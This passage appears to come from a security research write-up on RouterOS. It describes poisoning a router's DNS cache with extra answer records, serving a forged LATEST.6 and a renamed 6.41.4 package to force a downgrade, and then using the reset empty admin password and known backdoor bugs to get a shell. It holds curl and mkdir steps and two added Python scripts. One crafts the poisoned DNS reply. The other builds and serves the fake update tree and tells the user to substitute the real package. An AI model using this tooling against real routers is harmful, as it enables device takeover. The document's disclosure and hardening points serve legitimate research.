Of course, poisoning a single name isn't very useful on its own, since the router won't actually use it. However, the router does need several other MikroTik hostnames resolved as well. And thanks to another bug, we can poison them all at once: the router requests one resolution and we provide five answers back.

The router incorrectly caches all of these responses. Requesting LATEST.6 returns information about the most recent Stable release. You can see the response is a single line containing a version (6.45.6) and a Unix timestamp (1568106391); the timestamp is precisely when 6.45.6 was released. Using this information, the router then requests the CHANGELOG for 6.45.6:

curl [URL]
What's new in 6.45.6 (2019-Sep-10 09:06):

Important note!!! Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication.
Old API authentication method will also no longer work, see documentation for new login procedure:

*) capsman - fixed regulatory domain information checking when doing background scan
*) conntrack - improved system stability when using h323 helper (introduced in v6.45)
… lots more text.

That might not look familiar if you don't use RouterOS often, but the CHANGELOG is what gets displayed when the user checks for updates. Which just proves that RouterOS isn't doing anything to verify the information it is handed. As mentioned, you can take this further and trick RouterOS into downgrading by messing with the LATEST.6 information. I believe this is all predicated on being able to switch between the various branches without having to go through the special downgrade logic. First grab the output from LATEST.6fix (aka the long-term branch):

curl [URL]
6.44.5 1562236341

Next overwrite our previous LATEST.6 with a fictitious version (6.45.8) and the timestamp from LATEST.6fix (1562236341). Then create the 6.45.8 directory and download RouterOS 6.41.4 into it. Be sure to save the file as routeros-mipsbe-6.45.8.npk, since the router requests the package under the version it was advertised (for those testing on their own, change mipsbe to whatever architecture your router is using):

mkdir routeros/6.45.8/
cd routeros/6.45.8/
echo "lol" > CHANGELOG
curl [URL] > routeros-mipsbe-6.45.8.npk

After restarting the malicious web server, and assuming the router's DNS cache is poisoned, when the user installs the "new update" they'll bypass the normal logic that forbids downgrade via update and switch over to RouterOS 6.41.4. That seems worthy of a proof of concept video, but I have a couple of other points I'd like to make first.

There are a couple of reasons I chose to downgrade all the way to 6.41.4 (released April 9, 2018). The first reason is MikroTik's downgrade password reset logic. From MikroTik's release notes, the most interesting part is the clause about clearing passwords:

Important note!!! Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Old API authentication method will also no longer work, see documentation for new login procedure: Please secure your router after downgrading.

Since we tricked RouterOS into downgrading from 6.45.6 all the way down to 6.41.4, the admin user's default empty password is back. That means the attacker can log in as the admin user. The other reason I wanted to downgrade to 6.41.4 is that there are a few known vulnerabilities in that version that enable a backdoor on the system. Using those vulnerabilities I can get a full busybox shell.

Here is a video of the full attack, from DNS request all the way to the shell.

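The "one question, five answers" trick from the start of this post, as an added example that is not part of the original post or of any MikroTik code. It builds a DNS reply whose question section names a single host but whose answer section carries A records for five different hosts, all pointing at the attacker, and then runs that reply through two toy resolver caches: one that stores every answer record it receives (the behaviour described above) and one that only keeps records for the name it actually asked about. The hostnames and the 192.0.2.10 address are placeholders, since the post does not list the real MikroTik hostnames, and name compression is deliberately not handled.

```python
"""Added example: a DNS reply that answers one question with five A records
for five different names, and two caches that treat it differently.
Hostnames and the IP are placeholders, not the post's real values."""
import struct

ATTACKER_IP = "192.0.2.10"            # documentation-range address, constructed
QUERIED_NAME = "upgrade.example.com"  # placeholder for the name the router asks for
EXTRA_NAMES = ["download.example.com", "cloud.example.com",
               "cloud2.example.com", "license.example.com"]  # placeholders


def encode_name(name):
    """Wire-format a dotted name as length-prefixed labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, off):
    """Inverse of encode_name; returns (name, offset just past the name)."""
    labels = []
    while True:
        length = data[off]
        if length & 0xC0:
            raise ValueError("compression pointers are not handled in this example")
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), off


def a_record(name, ip, ttl=300):
    """One resource record: NAME, TYPE=A, CLASS=IN, TTL, RDLENGTH=4, RDATA."""
    rdata = bytes(int(octet) for octet in ip.split("."))
    return encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata


def build_poisoned_reply(txid, qname, extra_names, ip):
    """Reply with one question entry but len(extra_names)+1 answer records."""
    owners = [qname] + list(extra_names)
    # flags 0x8180: QR=1 (response), RD=1, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(owners), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question + b"".join(a_record(n, ip) for n in owners)


def parse_reply(packet):
    """Return (question names, [(owner name, ip, ttl)]) for the A records."""
    _txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    off = 12
    questions = []
    for _ in range(qd):
        name, off = decode_name(packet, off)
        off += 4  # skip QTYPE and QCLASS
        questions.append(name)
    answers = []
    for _ in range(an):
        name, off = decode_name(packet, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata = packet[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return questions, answers


def cache_everything(packet):
    """Flawed resolver: every answer record lands in the cache, asked for or not."""
    _, answers = parse_reply(packet)
    return {name: ip for name, ip, _ttl in answers}


def cache_only_asked(packet):
    """Hardened resolver: keep only records whose owner matches a question."""
    questions, answers = parse_reply(packet)
    asked = {q.lower() for q in questions}
    return {name: ip for name, ip, _ttl in answers if name.lower() in asked}


if __name__ == "__main__":
    pkt = build_poisoned_reply(0x1234, QUERIED_NAME, EXTRA_NAMES, ATTACKER_IP)
    print("flawed cache  :", cache_everything(pkt))
    print("hardened cache:", cache_only_asked(pkt))
```

The hardened cache is the minimum a client-side resolver should do: an answer record whose owner name was never in the question section has no business being cached, regardless of how many records the reply carries.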
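The spoofed update tree from the downgrade procedure above, as an added example that is not the post's own tooling. It forges the LATEST.6 line from the real LATEST.6fix output quoted in the post (6.44.5 1562236341), lays out routeros/LATEST.6, routeros/6.45.8/CHANGELOG and the package file renamed to the advertised version, and can serve that tree over HTTP. The /routeros/... URL paths, the plain version comparison in looks_like_upgrade and the package bytes are assumptions: the post elides the real URLs and does not show RouterOS's own comparison, and the real routeros-mipsbe-6.41.4.npk still has to be fetched separately and passed in as package_bytes.

```python
"""Added example: build and serve the fake update tree described in the post.
URL paths and the version check are assumptions; the package bytes stand in
for the real 6.41.4 .npk that the post downloads with curl."""
import os
import tempfile
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

ARCH = "mipsbe"                          # change to the target router's architecture
ADVERTISED = "6.45.8"                    # fictitious version the router is told about
REAL_LATEST_6FIX = "6.44.5 1562236341"   # copied from the post's LATEST.6fix output


def parse_latest(line):
    """'<version> <unix timestamp>' -> (version tuple, int timestamp)."""
    version, timestamp = line.split()
    return tuple(int(p) for p in version.split(".")), int(timestamp)


def forge_latest_6(latest_6fix_line, advertised=ADVERTISED):
    """Fake LATEST.6: the fictitious version paired with the long-term timestamp."""
    _version, timestamp = parse_latest(latest_6fix_line)
    return f"{advertised} {timestamp}\n"


def looks_like_upgrade(installed, latest_line):
    """Assumed client check: offer the update if the advertised version is higher.
    This is a plain tuple comparison, not RouterOS's actual logic."""
    return parse_latest(latest_line)[0] > tuple(int(p) for p in installed.split("."))


def build_tree(root, package_bytes, latest_6fix_line=REAL_LATEST_6FIX,
               arch=ARCH, advertised=ADVERTISED, changelog="lol\n"):
    """Write the three files the router fetches; returns {url_path: body}."""
    os.makedirs(os.path.join(root, "routeros", advertised), exist_ok=True)
    files = {
        "/routeros/LATEST.6": forge_latest_6(latest_6fix_line).encode(),
        f"/routeros/{advertised}/CHANGELOG": changelog.encode(),
        # the package is renamed to the advertised version so the router's
        # request for routeros-<arch>-6.45.8.npk finds the 6.41.4 bytes
        f"/routeros/{advertised}/routeros-{arch}-{advertised}.npk": package_bytes,
    }
    for url_path, body in files.items():
        with open(os.path.join(root, url_path.lstrip("/")), "wb") as f:
            f.write(body)
    return files


def build_tree_in_tempdir(package_bytes=b"placeholder for the real .npk"):
    """Convenience wrapper: build the tree in a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="fake-upgrade-")
    return root, build_tree(root, package_bytes)


def serve(root, port=8080):
    """Serve the tree; the poisoned DNS names must point at this host."""
    handler = partial(SimpleHTTPRequestHandler, directory=root)
    ThreadingHTTPServer(("0.0.0.0", port), handler).serve_forever()


if __name__ == "__main__":
    root, files = build_tree_in_tempdir()
    latest = files["/routeros/LATEST.6"].decode()
    print("offered to a 6.45.6 router?", looks_like_upgrade("6.45.6", latest))
    serve(root)
```

Run with the real package bytes substituted for the placeholder; the CHANGELOG body is whatever you want the user to read in the update dialog, which is exactly why an unverified CHANGELOG is a problem.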